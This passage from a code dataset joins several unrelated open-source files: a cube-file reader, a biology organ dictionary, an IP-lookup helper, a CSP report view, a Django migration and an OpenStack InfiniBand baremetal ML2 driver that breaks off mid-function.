(abridged info from http://paulbourke.net/dataformats/cube/ by <NAME>)
The file consists of a header which includes the atom information and the size as well
as orientation of the volumetric data. The first two lines of the header are comments. The
third line has the number of atoms included in the file followed by the position of the
origin of the volumetric data. The next three lines give the number of voxels along each axis
(x, y, z) followed by the axis vector. The last section in the header is one line for each
atom consisting of 5 numbers, the first is the atom number, the second is the charge, and
the last three are the x,y,z coordinates of the atom center. The volumetric data is straightforward,
one floating point number for each volumetric element.
Example
In the following example the volumetric data is a 40 by 40 by 40 grid, each voxel is 0.283459 units
wide and the volume is aligned with the coordinate axis. There are three atoms.
CPMD CUBE FILE.
OUTER LOOP: X, MIDDLE LOOP: Y, INNER LOOP: Z
3 0.000000 0.000000 0.000000
40 0.283459 0.000000 0.000000
40 0.000000 0.283459 0.000000
40 0.000000 0.000000 0.283459
8 0.000000 5.570575 5.669178 5.593517
1 0.000000 5.562867 5.669178 7.428055
1 0.000000 7.340606 5.669178 5.111259
-0.25568E-04 0.59213E-05 0.81068E-05 0.10868E-04 0.11313E-04 0.35999E-05
: : : : : :
: : : : : :
: : : : : :
In this case there will be 40 x 40 x 40 floating point values
: : : : : :
: : : : : :
: : : : : :
"""
import numpy as np
from monty.io import zopen
from pymatgen.core.sites import Site
from pymatgen.core.structure import Structure
from pymatgen.core.units import bohr_to_angstrom
# TODO: can multiprocessing be incorporated without causing issues during drone assimilation?
class Cube:
"""
Class to read Gaussian cube file formats for volumetric data.
Cube files are, by default, written in atomic units, and this
class assumes that convention.
"""
def __init__(self, fname):
"""
Initialize the cube object and store the data as self.data
Args:
fname (str): filename of the cube to read
"""
f = zopen(fname, "rt")
# skip header lines
for i in range(2):
f.readline()
# number of atoms followed by the position of the origin of the volumetric data
line = f.readline().split()
self.natoms = int(line[0])
self.origin = np.array(list(map(float, line[1:])))
# The number of voxels along each axis (x, y, z) followed by the axis vector.
line = f.readline().split()
self.NX = int(line[0])
self.X = np.array([bohr_to_angstrom * float(l) for l in line[1:]])
self.dX = np.linalg.norm(self.X)
line = f.readline().split()
self.NY = int(line[0])
self.Y = np.array([bohr_to_angstrom * float(l) for l in line[1:]])
self.dY = np.linalg.norm(self.Y)
line = f.readline().split()
self.NZ = int(line[0])
self.Z = np.array([bohr_to_angstrom * float(l) for l in line[1:]])
self.dZ = np.linalg.norm(self.Z)
self.voxel_volume = abs(np.dot(np.cross(self.X, self.Y), self.Z))
self.volume = abs(np.dot(np.cross(self.X.dot(self.NX), self.Y.dot(self.NY)), self.Z.dot(self.NZ)))
# The last section in the header is one line for each atom consisting of 5 numbers,
# the first is the atom number, second is charge,
# the last three are the x,y,z coordinates of the atom center.
self.sites = []
for i in range(self.natoms):
line = f.readline().split()
self.sites.append(Site(line[0], np.multiply(bohr_to_angstrom, list(map(float, line[2:])))))
self.structure = Structure(
lattice=[self.X * self.NX, self.Y * self.NY, self.Z * self.NZ],
species=[s.specie for s in self.sites],
coords=[s.coords for s in self.sites],
coords_are_cartesian=True,
)
# Volumetric data
self.data = np.reshape(np.array(f.read().split()).astype(float), (self.NX, self.NY, self.NZ))
def mask_sphere(self, radius, cx, cy, cz):
"""
Create a mask for a sphere with radius=radius, centered at cx, cy, cz.
Args:
radius: (float) radius of the mask (in Angstroms)
cx, cy, cz: (float) the fractional coordinates of the center of the sphere
"""
dx, dy, dz = (
np.floor(radius / np.linalg.norm(self.X)).astype(int),
np.floor(radius / np.linalg.norm(self.Y)).astype(int),
np.floor(radius / np.linalg.norm(self.Z)).astype(int),
)
gcd = max(np.gcd(dx, dy), np.gcd(dy, dz), np.gcd(dx, dz))
sx, sy, sz = dx // gcd, dy // gcd, dz // gcd
r = min(dx, dy, dz)
x0, y0, z0 = int(np.round(self.NX * cx)), int(np.round(self.NY * cy)), int(np.round(self.NZ * cz))
centerx, centery, centerz = self.NX // 2, self.NY // 2, self.NZ // 2
a = np.roll(self.data, (centerx - x0, centery - y0, centerz - z0))
i, j, k = np.indices(a.shape, sparse=True)
a = np.sqrt((sx * i - sx * centerx) ** 2 + (sy * j - sy * centery) ** 2 + (sz * k - sz * centerz) ** 2)
indices = a > r
a[indices] = 0
return a
def get_atomic_site_averages(self, atomic_site_radii):
"""
Get the average value around each atomic site.
Args:
atomic_site_radii (dict): dictionary determining the cutoff radius (in Angstroms)
for averaging around atomic sites (e.g. {'Li': 0.97, 'B': 0.77, ...}).
returns:
Array of site averages, [Average around site 1, Average around site 2, ...]
"""
return [self._get_atomic_site_average(s, atomic_site_radii[s.species_string]) for s in self.structure.sites]
def _get_atomic_site_average(self, site, radius):
"""
Helper function for get_atomic_site_averages.
Args:
site: Site in the structure around which to get the average
radius: (float) the atomic_site_radius (in Angstroms) for given atomic species
returns:
Average around the atomic site
"""
mask = self.mask_sphere(radius, *site.frac_coords)
return np.sum(self.data * mask) / np.count_nonzero(mask)
def get_atomic_site_totals(self, atomic_site_radii):
"""
Get the integrated total in a sphere around each atomic site.
Args:
atomic_site_radii (dict): dictionary determining the cutoff radius (in Angstroms)
for integrating around atomic sites (e.g. {'Li': 0.97, 'B': 0.77, ...}).
returns:
Array of site totals, [Total around site 1, Total around site 2, ...]
"""
return [self._get_atomic_site_total(s, atomic_site_radii[s.species_string]) for s in self.structure.sites]
def _get_atomic_site_total(self, site, radius):
"""
Helper function for get_atomic_site_averages.
Args:
site: Site in the structure around which to get the total
radius: (float) the atomic_site_radius (in Angstroms) for given atomic species
returns:
Average around the atomic site
"""
mask = self.mask_sphere(radius, *site.frac_coords)
return np.sum(self.data * mask)
def get_axis_grid(self, ind):
"""
Modified from pymatgen.io.vasp.outputs
Returns the grid for a particular axis.
Args:
ind (int): Axis index.
"""
ng = self.data.shape
num_pts = ng[ind]
lengths = self.structure.lattice.abc
return [i / num_pts * lengths[ind] for i in range(num_pts)]
def get_average_along_axis(self, ind):
"""
Modified from pymatgen.io.vasp.outputs
Get the averaged total of the volumetric data a certain axis direction.
For example, useful for visualizing Hartree Potentials.
Args:
ind (int): Index of axis.
Returns:
Average total along axis
"""
ng = self.data.shape
m = self.data
if ind == 0:
total = np.sum(np.sum(m, axis=1), 1)
elif ind == 1:
total = np.sum(np.sum(m, axis=0), 1)
else:
total = np.sum(np.sum(m, axis=0), 0)
return total / ng[(ind + 1) % 3] / ng[(ind + 2) % 3]
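# A minimal usage sketch (the filename and radii below are illustrative only):
#
#   cube = Cube("charge_density.cube")
#   site_averages = cube.get_atomic_site_averages({"O": 0.66, "H": 0.31})
#   planar_average = cube.get_average_along_axis(2)  # average along the third lattice vector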
| 2.59375
| 3
|
faker_biology/physiology/organs_data.py
|
richarda23/faker-biology
| 7
|
12780120
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Feb 13 10:20:19 2022
@author: richard
"""
organ_data = {
"Musculoskeletal system": {
"Human skeleton": {},
"Joints": {},
"Ligaments": {},
"Muscular system": {},
"Tendons": {},
},
"Digestive system": {
"Mouth": {"Teeth": {}, "Tongue": {}},
"Salivary glands": {
"Parotid glands": {},
"Submandibular glands": {},
"Sublingual glands": {},
},
"Pharynx": {},
"Esophagus": {},
"Stomach": {},
"Small intestine": {"Duodenum": {}, "Jejunum": {}, "Ileum": {}},
"Large intestine": {
"Cecum": {},
"Ascending colon": {},
"Transverse colon": {},
"Descending colon": {},
"Sigmoid colon": {},
},
"Rectum": {},
"Liver": {},
"Gallbladder": {},
"Mesentery": {},
"Pancreas": {},
"Anal canal": {},
},
"Respiratory system": {
"Nasal cavity": {},
"Pharynx": {},
"Larynx": {},
"Trachea": {},
"Bronchi": {},
"Bronchioles": {},
"Lungs": {},
"Muscles of breathing": {},
},
"Urinary system": {"Kidneys": {}, "Ureter": {}, "Bladder": {}, "Urethra": {}},
"Female reproductive system": {
"Internal reproductive organs": {
"Ovaries": {},
"Fallopian tubes": {},
"Uterus": {},
"Cervix": {},
"Vagina": {},
},
"External reproductive organs": {"Vulva": {}, "Clitoris": {}},
"Placenta": {},
},
"Male reproductive system": {
"Internal reproductive organs": {
"Testes": {},
"Epididymis": {},
"Vas deferens": {},
"Seminal vesicles": {},
"Prostate": {},
"Bulbourethral glands": {},
},
"External reproductive organs": {"Penis": {}, "Scrotum": {}},
},
"Endocrine system": {
"Pituitary gland": {},
"Pineal gland": {},
"Thyroid gland": {},
"Parathyroid glands": {},
"Adrenal glands": {},
"Pancreas": {},
},
"Circulatory system": {"Heart": {}, "Arteries": {}, "Veins": {}, "Capillaries": {}},
"Lymphatic system": {
"Lymphatic vessel": {},
"Lymph node": {},
"Bone marrow": {},
"Thymus": {},
"Spleen": {},
"Gut-associated lymphoid tissue": {"Tonsils": {}},
"Interstitium": {},
},
"Nervous system": {
"Brain": {"Cerebrum": {"Cerebral hemispheres": {}}, "Diencephalon": {}},
"brainstem": {"Midbrain": {}, "Pons": {}, "Medulla oblongata": {}},
"Cerebellum": {},
"spinal cord": {},
"ventricular system": {"Choroid plexus": {}},
},
"Peripheral nervous system": {
"Nerves": {
"Cranial nerves": {},
"Spinal nerves": {},
"Ganglia": {},
"Enteric nervous system": {},
}
},
"Sensory organs": {
"Eye": {"Cornea": {}, "Iris": {}, "Ciliary body": {}, "Lens": {}, "Retina": {}},
"Ear": {
"Outer ear": {"Earlobe": {}},
"Eardrum": {},
"Middle ear": {"Ossicles": {}},
"Inner ear": {
"Cochlea": {},
"Vestibule of the ear": {},
"Semicircular canals": {},
},
},
"Olfactory epithelium": {},
"Tongue": {"Taste buds": {}},
},
"Integumentary system": {
"Mammary glands": {},
"Skin": {},
"Subcutaneous tissue": {},
},
}
| 1.773438
| 2
|
app/utils.py
|
MilyMilo/hoodie
| 3
|
12780121
|
<filename>app/utils.py
import ipinfo as ipinfo_lib
import shodan as shodan_lib
from django.conf import settings
ipinfo = ipinfo_lib.getHandler(settings.IPINFO_TOKEN)
shodan = shodan_lib.Shodan(settings.SHODAN_TOKEN)
def get_ip_data(ip_address):
data = ipinfo.getDetails(ip_address)
return data.all
def get_shodan_data(ip_address):
try:
data = shodan.host(ip_address)
return _extract_shodan_data(data)
except:
return {}
def _extract_shodan_data(d):
extracted = {
"last_update": d["last_update"],
"vulns": d["vulns"],
"domains": d["domains"],
"ports": sorted(d["ports"]),
"os": d["os"],
"services": [],
}
for s in d["data"]:
se = {
"module": s["_shodan"]["module"],
"product": s.get("product", None),
"port": s["port"],
"transport": s["transport"],
}
if "http" in s:
se["http"] = {
"host": s["http"]["host"],
"location": s["http"]["location"],
"server": s["http"]["server"],
"title": s["http"]["title"],
"robots": s["http"]["robots"],
"components": s["http"]["components"]
}
if "dns" in s:
se["dns"] = {
"resolver_hostname": s["dns"]["resolver_hostname"],
"recursive": s["dns"]["recursive"],
"software": s["dns"]["software"],
}
if "ftp" in s:
se["ftp"] = {
"anonymous": s["ftp"]["anonymous"]
}
extracted["services"].append(se)
return extracted
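# A minimal usage sketch (the IP address is illustrative; both helpers call external APIs
# and require valid IPINFO_TOKEN / SHODAN_TOKEN Django settings):
#
#   ip_details = get_ip_data("8.8.8.8")
#   shodan_details = get_shodan_data("8.8.8.8")   # returns {} if the Shodan lookup fails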
| 2.171875
| 2
|
src/pretix/base/views/csp.py
|
pajowu/pretix
| 1
|
12780122
|
import json
import logging
from django.http import HttpResponse, HttpResponseBadRequest
from django.views.decorators.csrf import csrf_exempt
logger = logging.getLogger('pretix.security.csp')
@csrf_exempt
def csp_report(request):
try:
body = json.loads(request.body.decode())
logger.warning(
'CSP violation at {r[document-uri]}\n'
'Referer: {r[referrer]}\n'
'Blocked: {r[blocked-uri]}\n'
'Violated: {r[violated-directive]}\n'
'Original policy: {r[original-policy]}'.format(r=body['csp-report'])
)
except (ValueError, KeyError) as e:
logger.exception('CSP report failed ' + str(e))
return HttpResponseBadRequest()
return HttpResponse()
| 2.203125
| 2
|
upper method.py
|
aash-gates/aash-python-babysteps
| 7
|
12780123
|
<reponame>aash-gates/aash-python-babysteps
# converting the string to upper case - IBM Digital Nation
string = "Aashik Socially known as aash Gates"
print(string)
import time
time.sleep(0.33)
print("converting the string to upper case")
time.sleep(1.00)
new_string = string.upper()
print(new_string)
#end of the Program
| 3.6875
| 4
|
ctf/migrations/0003_auto_20171220_1132.py
|
scnerd/pythonathon_v3
| 0
|
12780124
|
# Generated by Django 2.0 on 2017-12-20 16:32
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('ctf', '0002_auto_20171220_1128'),
]
operations = [
migrations.AlterField(
model_name='category',
name='requires',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='categories_required_by', to='ctf.Question'),
),
migrations.AlterField(
model_name='question',
name='category',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='questions', to='ctf.Category'),
),
migrations.AlterField(
model_name='question',
name='hint',
field=models.TextField(blank=True, null=True),
),
migrations.AlterField(
model_name='question',
name='requires',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='questions_required_by', to='ctf.Question'),
),
]
| 1.6875
| 2
|
networking_mlnx_baremetal/plugins/ml2/mech_ib_baremetal.py
|
IamFive/networking-mlnx-baremetal
| 0
|
12780125
|
# Copyright 2020 HuaWei Technologies. All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
from ironicclient.common.apiclient import exceptions as ironic_exc
from neutron.db import provisioning_blocks
from neutron_lib import constants as n_const
from neutron_lib.api.definitions import portbindings
from neutron_lib.callbacks import resources
from neutron_lib.plugins.ml2 import api
from oslo_config import cfg
from oslo_log import log as logging
from networking_mlnx_baremetal import constants as const, exceptions
from networking_mlnx_baremetal import ironic_client
from networking_mlnx_baremetal import ufm_client
from networking_mlnx_baremetal._i18n import _
from networking_mlnx_baremetal.plugins.ml2 import config
from networking_mlnx_baremetal.ufmclient import exceptions as ufm_exec
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
config.register_opts(CONF)
MLNX_IB_BAREMETAL_ENTITY = 'MLNX-IB-Baremetal'
class InfiniBandBaremetalMechanismDriver(api.MechanismDriver):
"""OpenStack neutron ml2 mechanism driver for mellanox infini-band PKey
configuration when provisioning baremetal using Ironic.
"""
def initialize(self):
"""Perform driver initialization.
Called after all drivers have been loaded and the database has
been initialized. No abstract methods defined below will be
called prior to this method being called.
"""
self.ironic_client = ironic_client.get_client()
self.ufm_client = ufm_client.get_client()
self.conf = CONF[const.MLNX_BAREMETAL_DRIVER_GROUP_NAME]
self.allowed_network_types = const.SUPPORTED_NETWORK_TYPES
self.allowed_physical_networks = self.conf.physical_networks
def create_network_precommit(self, context):
"""Allocate resources for a new network.
:param context: NetworkContext instance describing the new
network.
Create a new network, allocating resources as necessary in the
database. Called inside transaction context on session. Call
cannot block. Raising an exception will result in a rollback
of the current transaction.
"""
pass
def create_network_postcommit(self, context):
"""Create a network.
:param context: NetworkContext instance describing the new
network.
Called after the transaction commits. Call can block, though
will block the entire process so care should be taken to not
drastically affect performance. Raising an exception will
cause the deletion of the resource.
"""
pass
def update_network_precommit(self, context):
"""Update resources of a network.
:param context: NetworkContext instance describing the new
state of the network, as well as the original state prior
to the update_network call.
Update values of a network, updating the associated resources
in the database. Called inside transaction context on session.
Raising an exception will result in rollback of the
transaction.
update_network_precommit is called for all changes to the
network state. It is up to the mechanism driver to ignore
state or state changes that it does not know or care about.
"""
pass
def update_network_postcommit(self, context):
"""Update a network.
:param context: NetworkContext instance describing the new
state of the network, as well as the original state prior
to the update_network call.
Called after the transaction commits. Call can block, though
will block the entire process so care should be taken to not
drastically affect performance. Raising an exception will
cause the deletion of the resource.
update_network_postcommit is called for all changes to the
network state. It is up to the mechanism driver to ignore
state or state changes that it does not know or care about.
"""
pass
def delete_network_precommit(self, context):
"""Delete resources for a network.
:param context: NetworkContext instance describing the current
state of the network, prior to the call to delete it.
Delete network resources previously allocated by this
mechanism driver for a network. Called inside transaction
context on session. Runtime errors are not expected, but
raising an exception will result in rollback of the
transaction.
"""
pass
def delete_network_postcommit(self, context):
"""Delete a network.
:param context: NetworkContext instance describing the current
state of the network, prior to the call to delete it.
Called after the transaction commits. Call can block, though
will block the entire process so care should be taken to not
drastically affect performance. Runtime errors are not
expected, and will not prevent the resource from being
deleted.
"""
# TODO(qianbiao.ng): if an UFM partition has no guid, it will be auto
# deleted. So, if port unbound logic is stable (remove guid when
# unbound), we may ignore delete_network_postcommit callback?
for segment in context.network_segments:
if self._is_segment_supported(segment):
segmentation_id = segment.get(api.SEGMENTATION_ID)
pkey = hex(segmentation_id)
try:
self.ufm_client.pkey.delete(pkey)
except ufm_exec.ResourceNotFoundError:
# NOTE(turnbig): ignore 404 exception, because of that the
# UFM partition key may have not been setup at this point.
LOG.info(_("UFM partition key %(pkey)s does not exists, "
"could not be deleted."),
{'pkey': pkey})
except ufm_exec.UfmClientError as e:
LOG.error(_("Failed to delete UFM partition key %(pkey)s, "
"reason is %(reason)s."),
{'pkey': pkey, 'reason': e})
raise
def create_subnet_precommit(self, context):
"""Allocate resources for a new subnet.
:param context: SubnetContext instance describing the new
subnet.
Create a new subnet, allocating resources as necessary in the
database. Called inside transaction context on session. Call
cannot block. Raising an exception will result in a rollback
of the current transaction.
"""
pass
def create_subnet_postcommit(self, context):
"""Create a subnet.
:param context: SubnetContext instance describing the new
subnet.
Called after the transaction commits. Call can block, though
will block the entire process so care should be taken to not
drastically affect performance. Raising an exception will
cause the deletion of the resource.
"""
pass
def update_subnet_precommit(self, context):
"""Update resources of a subnet.
:param context: SubnetContext instance describing the new
state of the subnet, as well as the original state prior
to the update_subnet call.
Update values of a subnet, updating the associated resources
in the database. Called inside transaction context on session.
Raising an exception will result in rollback of the
transaction.
update_subnet_precommit is called for all changes to the
subnet state. It is up to the mechanism driver to ignore
state or state changes that it does not know or care about.
"""
pass
def update_subnet_postcommit(self, context):
"""Update a subnet.
:param context: SubnetContext instance describing the new
state of the subnet, as well as the original state prior
to the update_subnet call.
Called after the transaction commits. Call can block, though
will block the entire process so care should be taken to not
drastically affect performance. Raising an exception will
cause the deletion of the resource.
update_subnet_postcommit is called for all changes to the
subnet state. It is up to the mechanism driver to ignore
state or state changes that it does not know or care about.
"""
pass
def delete_subnet_precommit(self, context):
"""Delete resources for a subnet.
:param context: SubnetContext instance describing the current
state of the subnet, prior to the call to delete it.
Delete subnet resources previously allocated by this
mechanism driver for a subnet. Called inside transaction
context on session. Runtime errors are not expected, but
raising an exception will result in rollback of the
transaction.
"""
pass
def delete_subnet_postcommit(self, context):
"""Delete a subnet.
:param context: SubnetContext instance describing the current
state of the subnet, prior to the call to delete it.
Called after the transaction commits. Call can block, though
will block the entire process so care should be taken to not
drastically affect performance. Runtime errors are not
expected, and will not prevent the resource from being
deleted.
"""
pass
def create_port_precommit(self, context):
"""Allocate resources for a new port.
:param context: PortContext instance describing the port.
Create a new port, allocating resources as necessary in the
database. Called inside transaction context on session. Call
cannot block. Raising an exception will result in a rollback
of the current transaction.
"""
pass
def create_port_postcommit(self, context):
"""Create a port.
:param context: PortContext instance describing the port.
Called after the transaction completes. Call can block, though
will block the entire process so care should be taken to not
drastically affect performance. Raising an exception will
result in the deletion of the resource.
"""
pass
def update_port_precommit(self, context):
"""Update resources of a port.
:param context: PortContext instance describing the new
state of the port, as well as the original state prior
to the update_port call.
Called inside transaction context on session to complete a
port update as defined by this mechanism driver. Raising an
exception will result in rollback of the transaction.
update_port_precommit is called for all changes to the port
state. It is up to the mechanism driver to ignore state or
state changes that it does not know or care about.
"""
pass
def update_port_postcommit(self, context):
# type: (api.PortContext) -> None
"""Update a port.
:param context: PortContext instance describing the new
state of the port, as well as the original state prior
to the update_port call.
Called after the transaction completes. Call can block, though
will block the entire process so care should be taken to not
drastically affect performance. Raising an exception will
result in the deletion of the resource.
update_port_postcommit is called for all changes to the port
state. It is up to the mechanism driver to ignore state or
state changes that it does not know or care about.
"""
port = context.current
original_port = context.original
if not self._is_baremetal_port(port):
LOG.info(_('Port is not a baremetal port, '
'skip update_port_postcommit callback.'))
return
if not self._is_port_bound(context):
LOG.info(_('Port is not bound by current driver, '
'skip update_port_postcommit callback.'))
return
binding_level = self._get_binding_level(context)
LOG.info(_('Port is bound by current driver with binding '
'level %(binding_level)s.'),
{'binding_level': binding_level})
current_vif_type = context.vif_type
original_vif_type = context.original_vif_type
# when port is unbound, unbind relevant guids from IB partition.
if (current_vif_type == portbindings.VIF_TYPE_UNBOUND
and original_vif_type not in const.UNBOUND_VIF_TYPES):
LOG.info(_("Port's VIF type changed from bound to unbound"))
LOG.info(_("Remove infiniband guids from partition key now."))
# binding:host_id has been clear in current port
node_uuid = original_port.get(portbindings.HOST_ID)
node_ib_guids = self._get_ironic_ib_guids(node_uuid)
if len(node_ib_guids) == 0:
LOG.error(_(
'For current port(%(port)s), could not find any '
'infiniband port presents in the same ironic '
'node(%(node_uuid)s), could not remove guids from '
'partition key.'),
{port: port, 'node_uuid': node_uuid})
return
LOG.info(_('To be removed infiniband port guids: %s.')
% node_ib_guids)
segmentation_id = binding_level.get(api.SEGMENTATION_ID)
self.ufm_client.pkey.remove_guids(hex(segmentation_id),
node_ib_guids)
LOG.info(_('Infiniband port guids %(guids)s has been removed '
'from partition key %(pkey)s.'),
{'guids': node_ib_guids,
'pkey': hex(segmentation_id)})
# when port is bound, mark port as provision completed.
if (current_vif_type not in const.UNBOUND_VIF_TYPES
and original_vif_type in const.UNBOUND_VIF_TYPES):
LOG.info(_("Port's VIF type changed from unbound to bound."))
# NOTE(qianbiao.ng): this provisioning_complete action maps to
# provisioning_blocks.add_provisioning_component called in
# bind_port process.
# provisioning_blocks.provisioning_complete(
# context._plugin_context, port['id'], resources.PORT,
# MLNX_IB_BAREMETAL_ENTITY)
pass
# when port binding fails, raise exception
if (port.get('status') == n_const.PORT_STATUS_ERROR
and current_vif_type == portbindings.VIF_TYPE_BINDING_FAILED):
LOG.info(_("Port binding failed, Port's VIF details: "
"%(vif_details)s."),
{'vif_details': context.vif_details})
if context.vif_details.get('driver') == const.DRIVE_NAME:
LOG.info(_("Port binding failure is caused by current driver. "
"Raise an exception to abort port update "
"process."))
raise exceptions.PortBindingException(**context.vif_details)
def delete_port_precommit(self, context):
"""Delete resources of a port.
:param context: PortContext instance describing the current
state of the port, prior to the call to delete it.
Called inside transaction context on session. Runtime errors
are not expected, but raising an exception will result in
rollback of the transaction.
"""
pass
def delete_port_postcommit(self, context):
"""Delete a port.
:param context: PortContext instance describing the current
state of the port, prior to the call to delete it.
Called after the transaction completes. Call can block, though
will block the entire process so care should be taken to not
drastically affect performance. Runtime errors are not
expected, and will not prevent the resource from being
deleted.
"""
# NOTE(turnbig): it's impossible to get relevant infiniband ports
# here, because the relevant Ironic node (binding:host_id) has been cleared
# before the port was deleted.
pass
def bind_port(self, context):
"""Attempt to bind a port.
:param context: PortContext instance describing the port
This method is called outside any transaction to attempt to
establish a port binding using this mechanism driver. Bindings
may be created at each of multiple levels of a hierarchical
network, and are established from the top level downward. At
each level, the mechanism driver determines whether it can
bind to any of the network segments in the
context.segments_to_bind property, based on the value of the
context.host property, any relevant port or network
attributes, and its own knowledge of the network topology. At
the top level, context.segments_to_bind contains the static
segments of the port's network. At each lower level of
binding, it contains static or dynamic segments supplied by
the driver that bound at the level above. If the driver is
able to complete the binding of the port to any segment in
context.segments_to_bind, it must call context.set_binding
with the binding details. If it can partially bind the port,
it must call context.continue_binding with the network
segments to be used to bind at the next lower level.
If the binding results are committed after bind_port returns,
they will be seen by all mechanism drivers as
update_port_precommit and update_port_postcommit calls. But if
some other thread or process concurrently binds or updates the
port, these binding results will not be committed, and
update_port_precommit and update_port_postcommit will not be
called on the mechanism drivers with these results. Because
binding results can be discarded rather than committed,
drivers should avoid making persistent state changes in
bind_port, or else must ensure that such state changes are
eventually cleaned up.
Implementing this method explicitly declares the mechanism
driver as having the intention to bind ports. This is inspected
by the QoS service to identify the available QoS rules you
can use with ports.
"""
port = context.current
is_baremetal_port = self._is_baremetal_port(port)
if not is_baremetal_port:
LOG.info(_('Port is not a baremetal port, skip binding.'))
return
# NOTE(turnbig): it seems ml2 driver will auto check whether a
# driver has been bound by a driver through binding_levels
# has_port_bound = self._is_port_bound(port)
# if has_port_bound:
# LOG.info(_('Port has been bound by this driver, skip binding.'))
# return
# try to bind segment now
LOG.info(_('Port is supported, will try binding IB partition now.'))
for segment in context.segments_to_bind:
if self._is_segment_supported(segment):
node_uuid = port.get(portbindings.HOST_ID)
node_ib_guids = self._get_ironic_ib_guids(node_uuid)
if len(node_ib_guids) == 0:
LOG.warning(_(
'For current port(%(port)s), could not find any IB '
'port presents in the same ironic '
'node(%(node_uuid)s), break bind port process now.'),
{port: port, 'node_uuid': node_uuid})
return
LOG.info(_('Load infiniband ports guids: %s.')
% node_ib_guids)
LOG.debug(_('Try to bind IB ports using segment: %s'), segment)
# update partition key for relevant guids
segment_id = segment[api.ID]
segmentation_id = segment[api.SEGMENTATION_ID]
try:
provisioning_blocks.add_provisioning_component(
context._plugin_context, port['id'], resources.PORT,
MLNX_IB_BAREMETAL_ENTITY)
self.ufm_client.pkey.add_guids(hex(segmentation_id),
guids=node_ib_guids)
LOG.info(_('Successfully bound IB ports %(ports)s to '
'partition %(pkey)s.'),
{'ports': node_ib_guids,
'pkey': hex(segmentation_id)})
# NOTE(turnbig): setting VIF details has no effect here.
# details = {
# const.MLNX_EXTRA_NS: {
# 'guids': node_ib_guids,
# 'pkey': segmentation_id,
# }
# }
# LOG.info(_('Update bound IB port vif info: '
# '%(vif_details)s.'),
# {'vif_details': details})
# context._binding.vif_details = jsonutils.dumps(details)
# NOTE(turnbig): chain current segment again to next driver
new_segment = copy.deepcopy(segment)
context.continue_binding(segment_id, [new_segment])
return
except ufm_exec.UfmClientError as e:
LOG.error(_("Failed to add guids %(guids)s to UFM "
"partition key %(pkey)s, "
"reason is %(reason)s."),
{'guids': node_ib_guids,
'pkey': hex(segmentation_id),
'reason': str(e)})
# TODO(qianbiao.ng): if IB partition binding fails,
# we should abort the bind_port process and exit.
vif_details = {'guids': node_ib_guids,
'pkey': hex(segmentation_id),
'driver': const.DRIVE_NAME,
'reason': str(e)}
context.set_binding(segment[api.ID],
portbindings.VIF_TYPE_BINDING_FAILED,
vif_details,
status=n_const.PORT_STATUS_ERROR)
@staticmethod
def _is_baremetal_port(port):
"""Return whether a port's VNIC_TYPE is baremetal.
Ports supported by this driver must have VNIC type 'baremetal'.
:param port: The port to check
:returns: true if the port's VNIC_TYPE is baremetal
"""
vnic_type = port[portbindings.VNIC_TYPE]
return vnic_type == portbindings.VNIC_BAREMETAL
def _is_network_supported(self, network):
"""Return whether a network is supported by this driver.
:param network: The network(
:class: openstack.network.v2.network.Network) instance to check
:returns: true if network is supported else false
"""
_this = InfiniBandBaremetalMechanismDriver
LOG.debug("Checking whether network is supported: %(network)s.",
{'network': network})
network_id = network.get('id')
network_type = network.get('provider_network_type')
segmentation_id = network.get('provider_segmentation_id')
physical_network = network.get('provider_physical_network')
if network_type not in self.allowed_network_types:
LOG.debug(_(
'Network %(network_id)s with segmentation-id '
'%(segmentation_id)s has network type %(network_type)s '
'but mlnx_ib_bm mechanism driver only '
'support %(allowed_network_types)s.'),
{'network_id': network_id,
'segmentation_id': segmentation_id,
'network_type': network_type,
'allowed_network_types': self.allowed_network_types})
return False
if not segmentation_id:
LOG.debug(_(
'Network %(network_id)s with segment %(id)s does not have a '
'segmentation id, mlnx_ib_bm requires a segmentation id to '
'create UFM partition.'),
{'network_id': network_id, 'id': segmentation_id})
return False
if not self._is_physical_network_matches(physical_network):
LOG.debug(_(
'Network %(network_id)s with segment %(id)s is connected '
'to physical network %(physnet)s, but mlnx_ib_bm mechanism '
'driver was pre-configured to watch on physical networks '
'%(allowed_physical_networks)s.'),
{'network_id': network_id,
'id': segmentation_id,
'physnet': physical_network,
'allowed_physical_networks': self.allowed_physical_networks})
return False
return True
def _is_segment_supported(self, segment):
"""Return whether a network segment is supported by this driver. A
segment dictionary looks like:
{
"network_id": "9425b757-339d-4954-a17b-dbb3f7061006",
"segmentation_id": 15998,
"physical_network": null,
"id": "3a0946cc-1f61-4211-8a33-b8e2b0b7a2a0",
"network_type": "vxlan"
},
Segment supported by this driver must:
- have network type 'vxlan' or 'vlan'.
- have physical networks in pre-configured physical-networks
- have a segmentation_id
:param segment: indicates the segment to check
:returns: true if segment is supported else false
"""
LOG.debug("Checking whether segment is supported: %(segment)s ",
{'segment': segment})
segment_id = segment[api.ID]
network_id = segment[api.NETWORK_ID]
network_type = segment[api.NETWORK_TYPE]
segmentation_id = segment[api.SEGMENTATION_ID]
physical_network = segment[api.PHYSICAL_NETWORK]
if network_type not in self.allowed_network_types:
LOG.debug(_(
'Network %(network_id)s with segment %(id)s has '
'network type %(network_type)s but mlnx_ib_bm mechanism '
'driver only support %(allowed_network_types)s.'),
{'network_id': network_id,
'id': segment_id,
'network_type': network_type,
'allowed_network_types': self.allowed_network_types})
return False
if not segmentation_id:
LOG.debug(_(
'Network %(network_id)s with segment %(id)s does not have a '
'segmentation id, mlnx_ib_bm requires a segmentation id to '
'create UFM partition.'),
{'network_id': network_id, 'id': segment_id})
return False
if not self._is_physical_network_matches(physical_network):
LOG.debug(_(
'Network %(network_id)s with segment %(id)s is connected '
'to physical network %(physnet)s, but mlnx_ib_bm mechanism '
'driver was pre-configured to watch on physical networks '
'%(allowed_physical_networks)s.'),
{'network_id': network_id,
'id': segment_id,
